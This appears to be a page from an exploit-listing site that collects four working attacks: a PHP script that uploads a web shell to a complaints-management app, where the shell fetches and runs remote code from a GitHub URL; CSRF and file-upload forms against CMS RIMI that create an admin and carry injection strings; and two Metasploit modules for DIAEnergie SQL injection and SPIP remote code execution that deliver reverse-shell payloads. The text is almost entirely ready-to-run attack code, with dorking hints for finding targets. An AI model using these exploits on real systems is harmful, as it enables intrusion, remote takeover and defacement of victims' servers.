Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Crime Complaints Reporting Management System 1.0 code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php target.com [+] payload : <?php function file_upload($website) { $file_name = "indoushka.php"; $webshell_payload = "<?php \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt'; \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); \$output = curl_exec(\$ch); curl_close(\$ch); if (\$output) { include 'data://text/plain;base64,' . base64_encode(\$output); } ?>"; $post_fields = array( 'action' => '', 'name' => 'Hacked By Indoushka', 'email' => 'indoushka4ever@gmail.com', 'contact' => '00213771818860', 'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name), 'about' => 'Hacked By Indoushka', 'qty' => '1' ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo "(+) Shell uploaded successfully.\n"; echo "(+) Access the shell at: $website/admin/assets/uploads/\n"; } if ($argc != 2) { echo "(+) Usage: php " . $argv[0] . " <website URL>\n"; echo "(+) Example: php " . $argv[0] . " http://example.com\n"; exit(-1); } $website = $argv[1]; file_upload($website); Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : CMS RIMI v1.3 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://github.com/myroot593/RIMICMS | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code create a new admin . [+] Go to the line 9. [+] Set the target site link Save changes and apply . [+] save code as poc.html . <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Profile User Form</title> </head> <body> <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-user.php" method="POST">  <label for="username">Username:</label> <input type="text" id="username" name="username" required>  <label for="password">Password:</label> <input type="password" id="password" name="password" required>  <label for="confirm_password">Confirm Password:</label> <input type="password" id="confirm_password" name="confirm_password" required>  <label for="nama">Nama:</label> <input type="text" id="nama" name="nama" required>  <label for="email">Email:</label> <input type="email" id="email" name="email" required>  <input type="hidden" name="id" value="">  <button type="submit">Submit</button> </form> </body> </html> ------------------ [+] Part 2 arbitrary file upload file uplaod [+] ------------- [+] Go to the line 3. [+] Set the target site link Save changes and apply . [+] Your file : 127.0.0.1/cmsrimi/content [+] save code as poc.html . <form action="http://127.0.0.1/RIMICMS-master/admin/tambah-berita.php" method="post" enctype="multipart/form-data"> <div class="form-group "> <label>Judul :</label> <input type="text" name="judul_berita" class="form-control" id="judul_berita1" placeholder="Masukan judul berita" value=""> </div> <div class="form-group "> <label>Isi Berita :</label> <textarea class="ckeditor" name="isi_berita" id="isi_berita"></textarea> </div> <div class="form-group"> <label>Kategori Berita :</label> <select class='form-control' name='kategori_berita' id='kategori_berita' required=''><option value=1>1</option><option value=a60CyEG6>a60CyEG6</option><option value=0+0+0+1>0+0+0+1</option><option value=basGxKs3>basGxKs3</option><option value=${9999829+9999678}>${9999829+9999678}</option><option value=1&n991278=v96422>1&n991278=v96422</option><option value=)>)</option><option value=/etc/passwd>/etc/passwd</option><option value=!(()&&!|*|*|>!(()&&!|*|*|</option><option value=^(#$!@#$)(()))******>^(#$!@#$)(()))******</option><option value=\'"()>\'"()</option><option value=testasp.vulnweb.com>testasp.vulnweb.com</option><option value=kategori-berita.php>kategori-berita.php</option><option value=file:///etc/passwd>file:///etc/passwd</option><option value=WEB-INF/web.xml?>WEB-INF/web.xml?</option><option value=WEB-INFweb.xml?>WEB-INFweb.xml?</option><option value=1\'">1\'"</option><option value=></option><option value=/WEB-INF/web.xml?>/WEB-INF/web.xml?</option><option value=/www.vulnweb.com>/www.vulnweb.com</option><option value=\'">\'"</option><option value=942313>942313</option><option value=@@5nFvp>@@5nFvp</option><option value=<!--><!--</option><option value=JyI=>JyI=</option><option value=//www.vulnweb.com>//www.vulnweb.com</option><option value=1_927257>1_927257</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1acuON4DgYSPCb>1acuON4DgYSPCb</option><option value=1_924662>1_924662</option><option value=1 src=943436>1 src=943436</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_996088>1_996088</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option><option value=1_984620>1_984620</option><option value=<a HrEF=jaVaScRiP><a HrEF=jaVaScRiP</option></select> </div> <div class="form-group"> <label>Status:</label> <select class="form-control" name="status_berita" id="status_berita"> <option value="Diterbitkan">Diterbitkan</option> <option value="Draft">Draft</option> </select> </div> <div class="form-group"> <label>Gambar Berita</label> <input type="hidden" name="tanggal_berita" id="tanggal_berita" value="24-08-22"> <input type="file" class="form-control-file" id="gambar_berita" name="gambar_berita"> </div> <button type="submit" class="btn btn-primary">Submit</button> </form> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)', 'Description' => %q{ SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics. This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'Michael Heinzl', # MSF exploit 'Tenable' # Discovery & PoC ], 'References' => [ [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'], [ 'CVE', '2024-4548'] ], 'DisclosureDate' => '2024-05-06', 'Platform' => 'win', 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Windows_Fetch', { 'Arch' => [ ARCH_CMD ], 'Platform' => 'win', 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL', 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' }, 'Type' => :win_fetch } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(928) ] ) end # Determine if the DIAEnergie version is vulnerable def check begin connect sock.put 'Who is it?' res = sock.get || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e vprint_error(e.message) return Exploit::CheckCode::Unknown ensure disconnect end if res.empty? vprint_status('Received an empty response.') return Exploit::CheckCode::Unknown end vprint_status('Who is it response: ' + res.to_s) version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/ version = res.match(version_pattern) if version[0].nil? Exploit::CheckCode::Detected end vprint_status('Version retrieved: ' + version[0]) unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610') return CheckCode::Safe end return CheckCode::Appears end def exploit execute_command(payload.encoded) end def execute_command(cmd) scname = Rex::Text.rand_text_alphanumeric(5..10).to_s vprint_status('Using random script name: ' + scname) year = rand(2024..2026) month = sprintf('%02d', rand(1..12)) day = sprintf('%02d', rand(1..29)) random_date = "#{year}-#{month}-#{day}" vprint_status('Using random date: ' + random_date) hour = sprintf('%02d', rand(0..23)) minute = sprintf('%02d', rand(0..59)) second = sprintf('%02d', rand(0..59)) random_time = "#{hour}:#{minute}:#{second}" vprint_status('Using random time: ' + random_time) # Inject payload begin print_status('Sending SQL injection...') connect vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--") sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--" res = sock.get unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.' fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s) end vprint_status('Injection - Expected response received: ' + res.to_s) disconnect # Trigger print_status('Triggering script execution...') connect sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1" res = sock.get unless res.to_s == 'Recalculate Script Start!' fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s) end vprint_status('Trigger - Expected response received: ' + res.to_s) disconnect print_good('Script successfully injected, check thy shell.') ensure # Cleanup print_status('Cleaning up database...') connect sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--" res = sock.get unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.' fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s) end vprint_status('Cleanup - Expected response received: ' + res.to_s) disconnect end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Payload::Php include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin', 'Description' => %q{ This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12. The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a payload manipulating the templating data processed by the `echappe_retour()` function, invoking `traitements_previsu_php_modeles_eval()`, which contains an `eval()` call. }, 'Author' => [ 'Valentin Lobstein', # Metasploit module author 'Laluka', # Vulnerability discovery 'Julien Voisin' # Review ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'], ['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather'] ], 'Platform' => ['php', 'unix', 'linux', 'win'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ [ 'PHP In-Memory', { 'Platform' => 'php', 'Arch' => ARCH_PHP # tested with php/meterpreter/reverse_tcp } ], [ 'Unix/Linux Command Shell', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD # tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command Shell', { 'Platform' => 'win', 'Arch' => ARCH_CMD # tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2024-08-16', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def check uri = normalize_uri(target_uri.path, 'spip.php') res = send_request_cgi({ 'uri' => uri.to_s }) return Exploit::CheckCode::Unknown('Target is unreachable.') unless res return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200 version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/ version = ::Regexp.last_match(1) if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/ version = ::Regexp.last_match(1) end return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version print_status("SPIP Version detected: #{version}") if Rex::Version.new(version) > Rex::Version.new('4.2.12') return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.") end return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.") end def php_exec_cmd(encoded_payload) dis = '$' + Rex::Text.rand_text_alpha(rand(4..7)) encoded_clean_payload = Rex::Text.encode_base64(encoded_payload) shell = <<-END_OF_PHP_CODE #{php_preamble(disabled_varname: dis)} $c = base64_decode("#{encoded_clean_payload}"); #{php_system_block(cmd_varname: '$c', disabled_varname: dis)} END_OF_PHP_CODE return shell end def exploit print_status('Preparing to send exploit payload to the target...') phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded) b64_payload = framework.encoders.create('php/base64').encode(phped_payload) payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]" print_status('Sending exploit payload to the target...') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'spip.php'), 'vars_get' => { 'action' => 'porte_plume_previsu' }, 'data' => "data=#{payload}" }) end end </code></pre>